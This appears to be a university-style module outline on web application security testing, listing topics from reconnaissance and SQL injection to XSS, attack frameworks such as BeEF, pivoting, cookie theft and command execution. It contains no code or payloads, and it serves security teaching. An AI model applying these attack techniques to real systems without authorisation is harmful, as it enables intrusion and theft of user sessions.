Develop the essential skills required to assess web application security and to apply an appropriate solution where necessary. Gain an insight into the processes and models underpinning development of secure web applications. Investigate best practices in the adoption of secure web application practices.
Introduction and Overview
Definition, Web Application Security Scenario, Common Security Mistakes, Why Security Mistakes Are Made, Need for Securing web applications, Types of Security Vulnerabilities, Types
Reconnaissance and Mapping
Discover the infrastructure within the application. Identify the machines and operating systems. SSL configurations and weaknesses. Explore virtual hosting and its impact on testing. Learn methods to identify load balancers. Software configuration discovery. Explore external information sources. Google hacking. Using tools to spider a Web site. Scripting to automate Web requests and spidering. Application flow charting. Relationship analysis within an application. JavaScript for the attacker
Server Side Discovery
Learn methods to discover various vulnerabilities. Information leakage. Username harvesting. Command injection. SQL injection. Blind SQL injection. Cross-Site Scripting (XSS). Cross-Site Request Forgery. Session issues. Explore differences between different data back-ends. Explore fuzzing and various fuzzing tools. Understand methods for attacking Web services
Client Side Discovery
Learn methods to discover various vulnerabilities. Information leakage. Username harvesting. Command injection. SQL injection. Blind SQL injection. Cross-Site Scripting (XSS). Cross-Site Request Forgery. Methods to decompile client-side code. Flash. Java. Explore malicious applets and objects. Discovery vulnerabilities in Web application through their client components.Understand methods for attacking Web services. Understand methods for testing Web 2.0 and AJAX based sites. AJAX and Web services. The attacker's perspective on Python and PHP. The ability to extend the tools we are using.
Exploiting
internal networks. Explore attack frameworks. AttackAPI. BeEF. XSS-ProxyWalk through an entire attack scenario. Exploit the various vulnerabilities discovered. Leverage the attacks to gain access to the system. Learn how to pivot our attacks through a Web application. Understand methods of interacting with a server through SQL injection. Exploit applications to steal cookies. Execute commands through Web application vulnerabilities
| Module Content & Assessment | |
|---|---|
| Assessment Breakdown | % |
| Other Assessment(s) | 100 |